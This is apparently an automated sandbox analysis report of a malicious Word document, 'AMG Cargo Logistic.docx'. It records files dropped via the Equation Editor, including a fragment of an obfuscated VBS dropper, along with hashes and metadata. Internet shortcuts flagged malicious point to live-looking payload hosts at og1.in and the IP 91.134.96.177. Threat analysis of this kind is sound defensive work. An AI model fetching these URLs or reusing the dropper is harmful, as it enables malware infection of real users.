                                                                                                                                                                                                SHA-512:9A535C1A5D53C9CD6B4B49F40C0911AB36484B64B99FAAD136CB4D3891A0F172BE8C03B59F0AA9252172FF74687878CF74FFE6BADE9769D61FBDE1D1A63AD9D8
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:......M.eFy...z..#.hbI..9h..S,...X.F...Fa.q.................................yL......v............f..O...x.5^......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\{E9E50C6B-15EE-4B68-B623-585F55730C00}

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):131072
                                                                                                                                                                                                Entropy (8bit):0.0255829556424752
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6:I3DPcLavxggLRX7oji1t92YltRXv//4tfnRujlw//+GtluJ/eRuj:I3DP0c77oGbM+vYg3J/
                                                                                                                                                                                                MD5:3E38E717CD5D3574FC4053405C7C87F5
                                                                                                                                                                                                SHA1:A65A342924CB79033B2106DE881C8FB8C4625E94
                                                                                                                                                                                                SHA-256:0A7E9C4611DED6C09BB8FF5ACD9636C55D1ADBDF1600420FB4435CA02C2ABD63
                                                                                                                                                                                                SHA-512:9F27359A2501233490D377FCA9A8534C4C94FC3F0127FB9CF9FE22C3604F3BF3AAE0780AEA6A4CAC559E6406054275755DD4C5E863DFB70653F9F046F106303B
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:......M.eFy...z.?.%x..O.7.o..hkS,...X.F...Fa.q............................@4Q..a.M..F............W.s...*L.8d.+".......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\AMG Cargo Logistic.LNK

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:12 2023, mtime=Fri Aug 11 15:42:12 2023, atime=Mon Sep 30 13:24:03 2024, length=788502, window=hide
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1059
                                                                                                                                                                                                Entropy (8bit):4.5718978921754765
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:12:8qjgXg/XAlCPCHaX8BYYlB/Pr+X+WS88NKOlQ1juicvbKM14OOlQtNDtZ3YilMMm:8k/XTM3ls88GQBNeTYQPDv3qY/57u
                                                                                                                                                                                                MD5:2BE4F24F88C8E6C62B945BED0C099B91
                                                                                                                                                                                                SHA1:E3D694BF373B9BC8EBF2E36530E42978DAA7A145
                                                                                                                                                                                                SHA-256:F6D29D0D07376D23E1BA23F1D4F4EB184A5E7650DABD5C7870873302490D59D5
                                                                                                                                                                                                SHA-512:2355DBBEA2A9C3747A3637A41EB927D79C6A94A5F188F92867E2BE2AF70C1EA64154028D0F2566C145FA09C18F5B99666C4CDAD2CA81EB3C8E4E28F8F6D2873C
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:L..................F.... .....*.r.....*.r...f.}fD................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....>Y.r..user.8......QK.X>Y.r*...&=....U...............A.l.b.u.s.....z.1......WH...Desktop.d......QK.X.WH.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2.....>Y.s .AMGCAR~1.DOC..\.......WG..WG.*.........................A.M.G. .C.a.r.g.o. .L.o.g.i.s.t.i.c...d.o.c.x.......................-...8...[............?J......C:\Users\..#...................\\301389\Users.user\Desktop\AMG Cargo Logistic.docx.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.A.M.G. .C.a.r.g.o. .L.o.g.i.s.t.i.c...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......301389..........D_....3N.

                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\S7UYq0.url

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                File Type:MS Windows 95 Internet shortcut text (URL=<https://og1.in/S7UYq0>), ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):47
                                                                                                                                                                                                Entropy (8bit):4.681832468514789
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:HRAbABGQYm2fjUzv:HRYFVm4ozv
                                                                                                                                                                                                MD5:A53EC7DED13AD3FF40ABCD534C27D766
                                                                                                                                                                                                SHA1:22D3B5EBEBD017DAA951BF1826D62952BDC7CDF7
                                                                                                                                                                                                SHA-256:C77D6054871DF78330ECD9A20E552469C8BC6A6DF8A1046BEF2D444CF5285C13
                                                                                                                                                                                                SHA-512:E1B3B7ECCB85983BDB7A6FDFCE80C1CDADD4F7CED8F90C670D428963982331DAD5250CA9FA472A8BE8B4D34AD9AD9DBDDE97B37B29DB98BAC33A7419DADE93D6
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Preview:[InternetShortcut]..URL=https://og1.in/S7UYq0..

                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                File Type:Generic INItialization configuration [misc]
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):112
                                                                                                                                                                                                Entropy (8bit):5.043613351489073
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:bDvKDgQFlTRQSLmiYeHLUlmxWv/1YeHLUlv:btQFZG/q
                                                                                                                                                                                                MD5:9CB11BF261F37B0812DCAB138E7BEFE4
                                                                                                                                                                                                SHA1:AC5DF649B947AF34E3C9D0D80AF29BF65D58D5AE
                                                                                                                                                                                                SHA-256:3AE975918402CAA0CBE6B4F7457A09215412A5089B2370A6F1A5170292D254F4
                                                                                                                                                                                                SHA-512:4A4DE735548E3FCEB838B41FA531D03FD41FE960B03F334D2FB02BF75C471BA5C04D5675199F94152F560FEB3B02F3163D5798EFF49DD0B20949BD4587F5E4FC
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:[folders]..S7UYq0.url=0..uc on 91.134.96.177.url=0..AMG Cargo Logistic.LNK=0..[misc]..AMG Cargo Logistic.LNK=0..

                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\uc on 91.134.96.177.url

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                File Type:MS Windows 95 Internet shortcut text (URL=<http://91.134.96.177/80/uc/>), ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):53
                                                                                                                                                                                                Entropy (8bit):4.659445162429413
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:HRAbABGQYm//WSKdVKQGKov:HRYFVm//VKaQGKov
                                                                                                                                                                                                MD5:B2B5585FFBBE6ECEAC7B9A54F231EBCA
                                                                                                                                                                                                SHA1:D7F347C319960D54350384AB53E39188CD69AC22
                                                                                                                                                                                                SHA-256:7B3A6AC8252C7A027AD0F19E3D54C074FF2CCCC1947E34326AAA905DA24D5077
                                                                                                                                                                                                SHA-512:AD89C45C5D5C8E69AAEB0BA1C5F03468F8BE5830806A1134CF2AA018B61118DF9B35932ABE17A9C7D2B81FE71BD949675C2C094262D3A74126E0A3C640360ABE
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Preview:[InternetShortcut]..URL=http://91.134.96.177/80/uc/..

                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):162
                                                                                                                                                                                                Entropy (8bit):2.503835550707526
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:vrJlaCkWtVyAHpAyYQGcWX2xKbylln:vdsCkWtpHS9VX/b+l
                                                                                                                                                                                                MD5:A604235065D4B469AB30855D5048A3E8
                                                                                                                                                                                                SHA1:618636A10771F211931A9D26063A08A50BFA4BDF
                                                                                                                                                                                                SHA-256:1C8E0165A83CCBF2B47064503AD0A7FF81C1573538A3E451534DB7BC99FB34D8
                                                                                                                                                                                                SHA-512:639ADFFD0E4AE6A86E49FB706E412887694804CB96C6E4C5C59F8194983957326C124CCB14AD7D56B63D401762633EAECE5C1EB3FF2A7878F1C1E4796E0CE523
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                                                                                                                                C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):247044
                                                                                                                                                                                                Entropy (8bit):3.7540611984178978
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6144:QT0K+XNr+WEx75gOUs5n7WgBzwmz7KTyXXcw5rN0gf:FK+Nr+WEbpL7BBzwS70yncw5rN0gf
                                                                                                                                                                                                MD5:AFA95FFEF9A1E2EE01B008DA56592B30
                                                                                                                                                                                                SHA1:9D5C767BB2F496377A5A797FC43E8C004530028C
                                                                                                                                                                                                SHA-256:4988DF74DF1AD4B83316BD4D9C110996BA2EB392C7C2ADB1422FFB60936611BE
                                                                                                                                                                                                SHA-512:632136F51D71D7632F70A5DADB1693801461C18C38357AD154B4BD51EE0D84E662952CE29B83996867C5716A2F8D3E325A693E88CD214B9383E9A2CE1ED57EF3
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Preview:..L.l.i.k.N.k.f.R.e.C.q.C.K.L.U.B.G.e.u.c.f.z.f.P. .=. .".G.L.I.l.i.f.L.U.A.W.n.p.h.k.G.U.x.A.c.B.K.A.L.i.".....i.f.G.t.L.K.W.W.U.C.G.P.m.N.m.g.a.k.i.z.o.O.W.C. .=. .".e.R.K.t.W.u.C.G.W.K.W.K.B.c.O.P.j.i.P.W.O.L.l.i.".....K.W.x.z.L.f.k.A.f.N.m.T.f.W.a.L.f.g.T.c.O.i.h.i. .=. .".L.G.O.z.m.B.A.j.G.L.l.Q.G.W.o.h.f.z.W.W.k.P.U.s.".....C.W.Z.p.G.A.b.l.B.W.h.R.d.K.v.c.N.W.W.h.c.o.A.T. .=. .".o.U.a.U.e.W.h.W.c.K.C.T.c.I.d.c.q.a.h.U.a.R.h.B.".....i.L.U.x.d.z.m.L.u.i.q.x.c.c.A.L.C.v.N.c.i.o.U.A. .=. .".G.W.c.N.P.f.N.K.o.m.L.U.P.J.Z.h.O.d.p.p.C.o.i.K.".....c.L.t.U.N.c.C.x.e.W.Z.d.B.T.p.g.U.L.Z.W.q.b.U.K. .=. .".O.K.W.W.p.W.l.o.K.L.f.W.A.P.z.k.U.e.L.L.U.R.m.W.".....i.u.K.s.x.s.h.J.c.K.B.n.G.k.m.m.r.G.H.l.C.h.N.q. .=. .".G.k.c.f.U.k.W.i.h.z.R.z.G.G.C.L.C.U.c.Z.P.G.i.W.".....W.u.i.L.K.f.a.W.W.c.G.Z.W.Z.J.f.I.P.C.Z.O.f.h.N. .=. .".a.N.b.K.K.b.f.k.W.L.K.z.K.u.C.p.W.R.m.N.f.L.W.L.".....L.q.m.P.K.z.v.m.A.K.G.W.N.N.W.G.A.l.L.i.o.W.A.k. .=. .".s.S.Z.I.c.i.W.K.L.K.O.L.o.W.N.b.K.C.U.L.k.t.q.d.".....d.Q.z.O.

                                                                                                                                                                                                C:\Users\user\Desktop\~$G Cargo Logistic.docx

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):162
                                                                                                                                                                                                Entropy (8bit):2.503835550707526
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:vrJlaCkWtVyAHpAyYQGcWX2xKbylln:vdsCkWtpHS9VX/b+l
                                                                                                                                                                                                MD5:A604235065D4B469AB30855D5048A3E8
                                                                                                                                                                                                SHA1:618636A10771F211931A9D26063A08A50BFA4BDF
                                                                                                                                                                                                SHA-256:1C8E0165A83CCBF2B47064503AD0A7FF81C1573538A3E451534DB7BC99FB34D8
                                                                                                                                                                                                SHA-512:639ADFFD0E4AE6A86E49FB706E412887694804CB96C6E4C5C59F8194983957326C124CCB14AD7D56B63D401762633EAECE5C1EB3FF2A7878F1C1E4796E0CE523
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                                                                                                                                Static File Info

                                                                                                                                                                                                General

                                                                                                                                                                                                File type:Microsoft Word 2007+
                                                                                                                                                                                                Entropy (8bit):7.994747969860824
                                                                                                                                                                                                TrID:
                                                                                                                                                                                                • Word Microsoft Office Open XML Format document (49504/1) 58.23%
                                                                                                                                                                                                • Word Microsoft Office Open XML Format document (27504/1) 32.35%
                                                                                                                                                                                                • ZIP compressed archive (8000/1) 9.41%
                                                                                                                                                                                                File name:AMG Cargo Logistic.docx
                                                                                                                                                                                                File size:788'502 bytes
                                                                                                                                                                                                MD5:cde646bbf76aa0cb430f71ec2408b4bd
                                                                                                                                                                                                SHA1:40fbea905916fc49bfcaf203b3b15e78d9053df5
                                                                                                                                                                                                SHA256:a91decdd65e45f46a226097d1331b51002c3c6120c5a2afdb7d29c5973166ce5
                                                                                                                                                                                                SHA512:22cea88742a8a11813bbc68fc661a5ed63bac3b20c4b8c718367737f3265c859a2506815f6a80fbc39c8ebbb4ebcae0adb7414e61c0660b66e7da94ec2002801
                                                                                                                                                                                                SSDEEP:12288:hNCRJClLkChwGm0LpsjYJ46gvycWL5c7PasQB2i4MYJv/u8wdyAxd6mzoGf2S2AM:h4ClKL0CjY7EDWQisQB2tXupdyZGt2AM
                                                                                                                                                                                                TLSH:88F42374E49ACDF3CE66F0B38661A4BCE6B4EEFC0645889365BD0345958E9A0F0D418F
                                                                                                                                                                                                File Content Preview:PK........~o>Y+..0............[Content_Types].xmlUT......f...f...f.V.j.@.}/.....i..J)....c.h.....%.7v&......SL".../.bu.3s4hu.;[<A...Z,..(..`:.....o.GQ )o...j.......V...X0.c-Z..IJ.-8.U......)....Q..j..z.. u...J..b....Rg..S..+.:.9$#.......N...\.....vZ...O..

                                                                                                                                                                                                File Icon

                                                                                                                                                                                                Icon Hash:65e6a3a3afb7bdbf

                                                                                                                                                                                                Static OLE Info

                                                                                                                                                                                                General

                                                                                                                                                                                                Document Type:OpenXML
                                                                                                                                                                                                Number of OLE Files:2

                                                                                                                                                                                                OLE File "AMG Cargo Logistic.docx"

                                                                                                                                                                                                Indicators
                                                                                                                                                                                                Has Summary Info:
                                                                                                                                                                                                Application Name:
                                                                                                                                                                                                Encrypted Document:False
                                                                                                                                                                                                Contains Word Document Stream:True
                                                                                                                                                                                                Contains Workbook/Book Stream:False
                                                                                                                                                                                                Contains PowerPoint Document Stream:False
                                                                                                                                                                                                Contains Visio Document Stream:False
                                                                                                                                                                                                Contains ObjectPool Stream:False
                                                                                                                                                                                                Flash Objects Count:0
                                                                                                                                                                                                Contains VBA Macros:False
                                                                                                                                                                                                Summary
                                                                                                                                                                                                Code Page:1252
                                                                                                                                                                                                Title:
                                                                                                                                                                                                Subject:
                                                                                                                                                                                                Author:91974
                                                                                                                                                                                                Keywords:
                                                                                                                                                                                                Template:Normal.dotm
                                                                                                                                                                                                Last Saved By:91974
                                                                                                                                                                                                Revion Number:4
                                                                                                                                                                                                Total Edit Time:1
                                                                                                                                                                                                Last Printed:2024-07-15 15:30:47
                                                                                                                                                                                                Create Time:2024-09-30T08:11:00Z
                                                                                                                                                                                                Last Saved Time:2024-09-30T08:12:00Z
                                                                                                                                                                                                Number of Pages:1
                                                                                                                                                                                                Number of Words:0
                                                                                                                                                                                                Number of Characters:0
                                                                                                                                                                                                Thumbnail:(n-&" WMFCX >l"^ EMF>)8X?F, EMF+@xxF\PEMF+"@@$@0@?!@@!"!"!"!"!"!'%&%"6"%Ld"""!??%6#%Ld""!??%,6#,%Ld,",,"!??%B6#B%LdB"BB"!??%[6#[%Ld["[["!??%6#%Ld""!??%6#%Ld""!??%6#%Ld""!??%6#%Ld""!??%6#%Ld"!??%"6%Ld""!??%"6"%Ld"""!??%|6|%Ld|||!??%6%Ld!??%6%Ld!??'%Ld!!!??%%6"%Ld!!!??%6%Ld!??'%(&%6"%Ld! !??%6%Ld!??'%(&%6"%Ld! !??%!6!%Ld!!!!??!bK!;$$==V(X(($$AA<C%'%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%(%""RpArial w< @XT!%l*w-atQml*w(X`tQ@X/~ZTX/~Z[dX{/~Zl*wO/~ZLZI/ |Z)1I/T!%M"*< M"*/*HX+w9Y+w`Y+wdv%'A>TT+UUA&ALP1TT/AUUA&A/LP2TTHZUUA&AHLP3TTqUUA&AqLP4TTUUA&AyL"P5TTUUA&ALP6TTUUA&ALP7TTUUA&ALP8TTJTUUA&AJLPATTUUA&ALPBTTr}UUA&ArLPC%%"!%'A>#'%Ld#B"B(C!??'%(LdJ!??&WMFC>'%(LdJ!??'%(Ld"(!??RpCambria w< T!%l*w2atQml*wF`tQ/F!F/!Ft"{/!*wO/!!I/ !L}I/T!%P"< P"a#/P"$ +w94!@ F+w Fdv%RpCambria w< T!%l*wKatQml*w^=`tQ/^=!^=/!^=t"{/!*wO/!!I/ !XI/T!%P"2< P"2a#/P"1$ +w94!@ ^=+w ^=dv%Rp Calibri w< T!%l*w#atQml*w,`tQ/,!,/!,t"{/!*wO/!!I/ !I/T!%P",< P",a#/P"+$ +w94!@ ,+w ,dv%T|&lUUA&A&L\N ordreTdUUA&ALTDATE%%%"!%%TUUA&ALtSOLDE AU 02/01/2024Rp Arial w< T!%l*w-atQml*wX=`tQ/X=!X=/!X=t"{/!*wO/!!I/ !I/T!%P"< P"a#/P"$ +w94!@ X=+w X=dv%%%%"!%%#C[T$CYUUA&AC$LWORMS ALGERIE SHIPPING SPA (WALSHIP)%%%"!%%#\TUUA&A"^LtCaisse Annaba - 2024%%%"!%%TUUA&AL|LIBELLES / DESIGNATIONS%%"!%%#%%"!%%'%((&%"6"B%Ld""A",!??%|6|B%Ld||A|,!??%6B%LdA,!??%6B%LdA,!??%|6|%Ld|||!??%6%Ld!??%6%Ld!??'%(&%"B6"%Ld"B""B!??%|6|%Ld|||Q!??%6%LdQ!??%((&%"6%Ld""!??%",6,%Ld",,",!??'%(&%#B6B%Ld#BB#B!??%#6%Ld##!??%#6%Ld##!??%#6%Ld##!??%#6%Ld##!??%#6%Ld#!??%(%"!%#%"!%'%%6%Ld!??%6%Ld!??%"Q|P(x( F4(EMF+*@$??FEMF+@''',',',--""-@!"-#-@!"-,,#-@!",-BB#-@!"B-[[#-@!"[-#-@!"-#-@!"-#-@!"-#-@!"-#-@!"-"-@!"-""-@!"-||-@!|--@!--@!-@!!--"-@!!--@!--"-@! --@!--"-@! -!!-@!!,---$----$----$----$----$----$----$----$----$----$----$----$----$----$---''Arial-'A>212/22H32q42y"52627282JA2B2rC-"System-'-'A>,#-@!C(B"-@!J-@!J-@!("Cambria-Cambria- Calibri-2&N ordre2DATE---'--,$2SOLDE AU 02/01/2024 Arial----'--,[C#=2C$WORMS ALGERIE SHIPPING SPA (WALSHIP)---'--,\#%2^"Caisse Annaba - 2024---'--,*2LIBELLES / DESIGNATIONS--'--,#--'--,--"B"-@!,"-|B|-@!,|-B-@!,-B-@!,-||-@!|--@!--@!--B""-@!B"-||-@!Q|--@!Q--"-@!"-,",-@!,"--B#B-@!B#-#-@!#-#-@!#-#-@!#-#-@!#-#-@!#--'-,#-'-,---@!--@!-'#A(
                                                                                                                                                                                                Creating Application:Microsoft Office Word
                                                                                                                                                                                                Security:0
                                                                                                                                                                                                Document Summary
                                                                                                                                                                                                Document Code Page:1252
                                                                                                                                                                                                Number of Lines:1
                                                                                                                                                                                                Number of Paragraphs:1
                                                                                                                                                                                                Thumbnail Scaling Desired:false
                                                                                                                                                                                                Company:Grizli777
                                                                                                                                                                                                Contains Dirty Links:false
                                                                                                                                                                                                Shared Document:false
                                                                                                                                                                                                Changed Hyperlinks:false
                                                                                                                                                                                                Application Version:12.0000

                                                                                                                                                                                                Streams

                                                                                                                                                                                                Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                                                                                                                                                General
                                                                                                                                                                                                Stream Path:\x1CompObj
                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Stream Size:114
                                                                                                                                                                                                Entropy:4.25248375192737
                                                                                                                                                                                                Base64 Encoded:True
                                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                                                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Stream Path: \x1Ole, File Type: data, Stream Size: 20
                                                                                                                                                                                                General
                                                                                                                                                                                                Stream Path:\x1Ole
                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Stream Size:20
                                                                                                                                                                                                Entropy:0.5689955935892812
                                                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Stream Path: \x3EPRINT, File Type: Windows Enhanced Metafile (EMF) image data version 0x10000, Stream Size: 55488
                                                                                                                                                                                                General
                                                                                                                                                                                                Stream Path:\x3EPRINT
                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                Stream Size:55488
                                                                                                                                                                                                Entropy:3.128894440734097
                                                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                                                Data ASCII:. . . . l . . . . . . . g . . . . + . . . . . . . . . . . . . f . . Z G . . E M F . . . . . . [ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ K . . h C . . F . . . , . . . . . . E M F + . @ . . . . . . . . . . . . . . . . X . . . X . . . F . . . \\ . . . P . . . E M F + " @ . . . . . . . . . . . @ . . . . . . . . . . $ @ . . . . . . . . . . 0 @ . . . . . . . . . . . . ? ! @ . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                Data Raw:01 00 00 00 6c 00 00 00 00 00 00 00 67 00 00 00 0d 2b 00 00 db 0c 00 00 00 00 00 00 00 00 00 00 66 b6 00 00 5a 47 00 00 20 45 4d 46 00 00 01 00 c0 d8 00 00 5b 07 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec 13 00 00 c8 19 00 00 d8 00 00 00 17 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 4b 03 00 68 43 04 00 46 00 00 00 2c 00 00 00 20 00 00 00 45 4d 46 2b 01 40 01 00
                                                                                                                                                                                                Stream Path: \x3ObjInfo, File Type: data, Stream Size: 6
                                                                                                                                                                                                General
                                                                                                                                                                                                Stream Path:\x3ObjInfo
                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Stream Size:6
                                                                                                                                                                                                Entropy:1.2516291673878228
                                                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                                                Data ASCII:. . . . . .
                                                                                                                                                                                                Data Raw:00 00 03 00 01 00
                                                                                                                                                                                                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 248
                                                                                                                                                                                                General
                                                                                                                                                                                                Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Stream Size:248
                                                                                                                                                                                                Entropy:2.7990677635209242
                                                                                                                                                                                                Base64 Encoded:True
                                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C a i s s e 2 0 2 4 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . .
                                                                                                                                                                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 a4 00 00 00
                                                                                                                                                                                                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 23536
                                                                                                                                                                                                General
                                                                                                                                                                                                Stream Path:\x5SummaryInformation
                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Stream Size:23536
                                                                                                                                                                                                Entropy:3.0728310684122637
                                                                                                                                                                                                Base64 Encoded:True
                                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . [ . . . . . . . . . . P . . . . . . . X . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t C o r p o r a t i o n . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . @ . . . . c ? . @ . . . . F ` . . . . . . . . . . . G . . . Z . . . . . . . . ( . . . . . . . . . . n - . . . . . . . . . .
                                                                                                                                                                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c0 5b 00 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 78 00 00 00 12 00 00 00 88 00 00 00 0b 00 00 00 a0 00 00 00 0c 00 00 00 ac 00 00 00 0d 00 00 00 b8 00 00 00 13 00 00 00 c4 00 00 00 11 00 00 00 cc 00 00 00
                                                                                                                                                                                                Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 28134
                                                                                                                                                                                                General
                                                                                                                                                                                                Stream Path:Workbook
                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                                Stream Size:28134
                                                                                                                                                                                                Entropy:4.264894359698655
                                                                                                                                                                                                Base64 Encoded:True
                                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . # . 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . . . .
